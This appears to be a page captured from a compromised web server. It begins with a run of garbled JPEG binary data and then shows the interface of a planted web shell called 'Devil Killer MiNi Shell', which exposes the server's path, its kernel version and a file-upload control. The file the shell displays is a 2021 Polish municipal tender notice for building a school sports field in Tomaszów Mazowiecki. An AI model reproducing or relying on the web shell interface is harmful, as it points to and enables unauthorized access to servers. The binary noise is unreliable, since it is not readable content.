JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210715/0011474001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00114740 z dnia 2021-07-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa boiska wielofunkcyjnego przy Zespole Szkolno - Przedszkolnym nr 5 – Szkole Podstawowej nr 8 w Tomaszowie Mazowieckim. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIASTO TOMASZÓW MAZOWIECKI</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">URZĄD MIASTA TOMASZÓW MAZOWIECKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648310</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">POW 10/16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tomaszów Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">447242311</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">447242311</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam.pub@tomaszow-maz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.tomaszow.miasta.pl/public/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa boiska wielofunkcyjnego przy Zespole Szkolno - Przedszkolnym nr 5 – Szkole Podstawowej nr 8 w Tomaszowie Mazowieckim. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8433ba76-d3f6-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00114740</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001434/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa boiska wielofunkcyjnego przy ZespoleSzkolno – Przedszkolnym nr 5 Szkole Podstawowej nr 8 w Tomaszowie Mazowieckim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.tomaszow.miasta.pl/public/?id=209890 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w<br/>niniejszympostępowaniu, w tym składanie ofert, wymiana informacji (wyjaśnienia i zmiana treści<br/>SWZ,zawiadomienia, wnioski) oraz przekazywanie dokumentów lub oświadczeń między zamawiającym<br/>awykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej. Zamawiający<br/>rekomendujewykonawcom, aby komunikowali się z zamawiającym (np. zwrócenie się do<br/>zamawiającego owyjaśnienie SWZ) za pomocą poczty elektronicznej na adres:<br/>zam.pub@tomaszowmaz.pl.Dopuszczalna jest także komunikacja przez:<br/>url.https://miniportal.uzp.gov.pl/ePUAP(Elektroniczna Skrzynka Podawcza Szczegółowe informacje w<br/>tym zakresie zawarte w SWZ.www.gov</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentówelektronicznych,elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przyich użyciu zostały opisane w Instrukcji użytkowania systemu miniPortal oraz<br/>Regulaminie ePUAP</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający, udostępnia dane osobowe, o których<br/>mowaw art. 10 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia<br/>2016 r. wsprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawieswobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie oochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.), zwanego<br/>dalej"rozporządzeniem 2016/679".2. Zamawiający realizuje obowiązki, o których mowa w art. 13 ust. 1<br/>– 2rozporządzenia 2016/679, przez zamieszczenie wymaganych informacji w SIWZ, zgodnie<br/>zponiższym.3. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniemdanych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str.<br/>1), dalej„RODO”, informuję, że: 1) administratorem Pani/Pana danych osobowych jest Gmina -<br/>MiastoTomaszów Mazowiecki w imieniu której działa Prezydent Miasta Tomaszowa Mazowieckiego,<br/>ul. POW10/16, 97-200 Tomaszów Maz., NIP 773-16-56-546, REGON 590648310,2) inspektorem<br/>ochronydanych osobowych w Urzędzie Miasta w Tomaszowie Mazowieckim jest wyznaczony<br/>pracownikUrzędu Miasta w Tomaszowie Mazowieckim,3) Pani/Pana dane osobowe przetwarzane będą<br/>napodstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o<br/>udzieleniezamówienia publicznego,4) odbiorcami Pani/Pana danych osobowych będą osoby lub<br/>podmioty,którym udostępniona zostanie dokumentacja postępowania,5) Pani/Pana dane osobowe<br/>będąprzechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a<br/>jeżeliczas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy;6)obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jestwymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniuo udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają zustawy Pzp; 7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane wsposób zautomatyzowany, stosowanie do art. 22 RODO;8) posiada Pani/Pan:− na<br/>podstawie art. 15RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;− na podstawie<br/>art. 16 RODOprawo do sprostowania Pani/Pana danych osobowych **;− na podstawie art. 18 RODO<br/>prawo żądaniaod administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, októrych mowa w art. 18 ust. 2 RODO ***; − prawo do wniesienia skargi do Prezesa<br/>Urzędu OchronyDanych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych<br/>Pani/Pana dotyczącychnarusza przepisy RODO;9) nie przysługuje Pani/Panu:− w związku z art. 17<br/>ust. 3 lit. b, d lub e RODOprawo do usunięcia danych osobowych;− prawo do przenoszenia danych<br/>osobowych, o którym mowaw art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danychosobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych<br/>jest art. 6 ust. 1 lit. cRODO. 4. Zamawiający informuje, iż wystąpienie z żądaniem, o którym mowa w<br/>art. 18 ust. 1rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRIK.271.1.6.2021.ZP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1918006,68 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W zakres zamówienia wchodzi:<br/>1)	Rozbiórka elementów zagospodarowania terenu.<br/>2)	Budowa 2 płyt boiska o nawierzchni poliuretanowej w kolorze czerwonym.<br/>3)	Budowa 3-torowej bieżni okólnej z zeskocznią do skoku w dal (wypełnienie zeskoczni piaskiem płukanym) o nawierzchni poliuretanowej w kolorze czerwonym.<br/>4)	Budowa rzutni do pchnięcia kulą o nawierzchni poliuretanowej w kolorze czerwonym.<br/>5)	Budowa rzutni do pchnięcia kulą o nawierzchni poliuretanowej.<br/>6)	Budowa ogrodzenia płyty boiska do siatkówki z siatki z drutu stalowego ocynkowanego (przed powleczeniem) malowanego proszkowo na kolor zielony. Ogrodzenie na słupach stalowych, ocynkowanych ogniowo powlekanych farbą proszkową na kolor zielony. Ogrodzenie posiadać będzie 2 furtki z zamkiem.<br/>7)	Budowa piłko chwytów o wysokości h = 6,0 m z siatki polipropylenowej rozpiętych na linkach stalowych na śrubach rzymskich, na słupach stalowych ocynkowanych ogniowo powlekanych farbą proszkową na kolor zielony.<br/>8)	Zakup dostawa i montaż kompletnego sprzętu sportowego, w tym m. in.:<br/>a)	kosze do koszykówki + tuleje montażowe,<br/>b)	bramki do piłki ręcznej + tuleje montażowe,<br/>c)	słupki z siatką do siatkówki/tenisa (regulowana siatka) + tuleje montażowe, tablice do koszykówki,<br/>d)	bloki startowe,<br/>e)	płotki treningowe do biegów przez płotki,<br/>f)	stopery elektroniczne z odczytem 0,01 s,<br/>g)	pałeczki sztafetowe,<br/>h)	belka do odbicia na skoczni do skoku w dal z zaślepką,<br/>i)	wkładki z plasteliną i szpachelką do jej wyrównywania,<br/>j)	sprzęt do wyrównywania piasku skoczni do skoku w dal,<br/>k)	szczotki/miotły do czyszczenia kół i rozbiegów,<br/>l)	wózek do transportu płotków,<br/>m)	wózek do transportu bloków.<br/>Pozostałe elementy zamówienia określa dokumentacja techniczna udostępniona na<br/>stronie prowadzonego postępowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31527200-8 - Oświetlenie zewnętrzne</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45212140-9 - Obiekty rekreacyjne</p> <p class="mb-0">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</p> <p class="mb-0">45212221-1 - Roboty budowlane związane z obiektami na terenach sportowych</p> <p class="mb-0">45223810-7 - Konstrukcje gotowe</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233320-8 - Fundamentowanie dróg</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <p class="mb-0">45421160-3 - Instalowanie wyrobów metalowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert w oparciu o zapisy SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	Zamawiający uzna, iż Wykonawca spełni warunek udziału w postępowaniu jeżeli wykaże, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie wykonał: co najmniej 1 robotę budowlaną polegającą na budowie boiska wykonanego z nawierzchni poliuretanowej o powierzchni min. 1000 m2,<br/><br/><br/><br/><br/>2)	Zamawiający uzna, iż Wykonawca spełni warunek udziału w postępowaniu jeżeli wykaże, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie wykonał: co najmniej 1 robotę budowlaną polegającą na budowie bieżni okrężnej wykonanej z nawierzchni poliuretanowej o powierzchni min. 1200 m2,<br/><br/>3)	Zamawiający uzna, iż Wykonawca spełni warunek, jeżeli wykaże, iż dysponuje lub będzie dysponował min. 1 osobą, która będzie uczestniczyć w realizacji zadania (kierownikiem budowy) posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej,<br/><br/>4)	Zamawiający uzna, iż Wykonawca spełni warunek, jeżeli wykaże, iż dysponuje lub będzie dysponował min. 1 osobą (kierownikiem robót budowlanych - sanitarnych) która będzie uczestniczyć w realizacji zadania posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń wodociągowych i kanalizacyjnych,<br/><br/>5)	Zamawiający uzna, iż Wykonawca spełni warunek, jeżeli wykaże, iż dysponuje lub będzie dysponował min. 1 osobą (kierownikiem robót budowlanych - elektrycznych), która będzie uczestniczyć w realizacji zadania posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/><br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zgodnie z rozdz. 13 ust. 3 pkt 6 SWZ - zobowiązanie podmiotu udostępniającego zasoby <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia niepodlegania wykluczeniu - zamawiający wymaga złożenia oświadczenia o<br/>spełnieniu warunków i braku podstaw wykluczenia</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – (zał. 4 SWZ).<br/><br/>2)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - (zał. 6 SWZ).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowym środkiem dowodowym jest wykaz sporządzony przez wykonawcę określający<br/>parametry oferowanego produktu - (zał. 7 SWZ).Dodatkowa informacja dla wykonawców w<br/>zakresie złożenia przedmiotowego środka dowodowego, o którym mowa w ust. 3 pkt 8<br/>SWZ.Przedmiotowy środek dowodowy w niniejszym postępowaniu (wykaz określający parametry<br/>oferowanego produktu) służy ocenie zgodności zaoferowanego przedmiotu zamówienia z<br/>opisem zawartym w dokumentach zamówienia i stanowi podstawę weryfikacji poprawności<br/>merytorycznej oferty. Innymi słowy na bazie tego wykazu, zamawiający oceni czy wykonawca<br/>oferuje przedmiot zamówienia zgodny z opisem przedmiotu zamówienia w zakresie wybranych<br/>elementów. Definicja przedmiotowych środków dowodowych zawarta została w art. 7 pkt 20<br/>ustawy pzp. Są to więc środki służące potwierdzeniu zgodności oferowanych dostaw, usług lub<br/>robót budowlanych z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu<br/>zamówienia lub opisie kryteriów oceny ofert, lub wymaganiami związanymi z realizacją<br/>zamówienia. W niniejszym postępowaniu - mają one służyć co wskazano już powyżej jako<br/>możliwość zweryfikowania poprawności merytorycznej treści oferty. Taka definicja oznacza, że<br/>katalog przedmiotowych środków dowodowych jest w istocie katalogiem otwartym, ponieważ<br/>ustawodawca nie określił wprost zamkniętego katalogu samych środków, lecz wskazał jedynie<br/>jaką mają pełnić funkcję w postępowaniu o udzielenie zamówienia publicznego. Warto zwrócić<br/>uwagę, że ustawa pzp - nie daje też zamawiającemu nieograniczonej swobody w żądaniu<br/>przedmiotowych środków dowodowych. Przepis art. 106 ust. 2 stanowi, że zamawiający może<br/>żądać przedmiotowych środków dowodowych tylko proporcjonalnych do przedmiotu zamówienia<br/>i tylko z nim związanych. W pełni aktualna na okoliczność żądania przedmiotowych środków<br/>dowodowych będzie także zasada proporcjonalności, która stanowi, że zamawiający może<br/>żądać od wykonawców wyłącznie środków dowodowych niezbędnych do przeprowadzenia<br/>postępowania. Biorąc pod uwagę powyższe wymóg złożenia wraz z ofertą wykazu<br/>określającego parametry oferowanego produktu w ocenie zamawiającego spełnia powyższe<br/>wymogi. Tym samym, zamawiający zgodnie z art. 107 ust. 1 pzp wymaga złożenia<br/>przedmiotowego środka dowodowego wraz z ofertą. Jeżeli wykonawca nie złoży<br/>przedmiotowego środka dowodowego zamawiający na podst. art. 107 ust. 2 pzp - wezwie do<br/>jego złożenia lub uzupełnienia w wyznaczonym terminie.Zamawiający będzie miał prawo<br/>zgodnie z art. 107 ust. 4 pzp - żądać od wykonawców wyjaśnień dotyczących treści<br/>przedmiotowego środka dowodowego. Zgodnie z art. 218 ust. 2 pzp treść oferty musi być<br/>zgodna z wymaganiami zamawiającego określonymi w dokumentach zamówienia a co za tym<br/>idzie oferowany produkt zgodny być musi z opisanym przez zamawiającego. Adresatem normy<br/>prawnej wyrażonej w powyższym 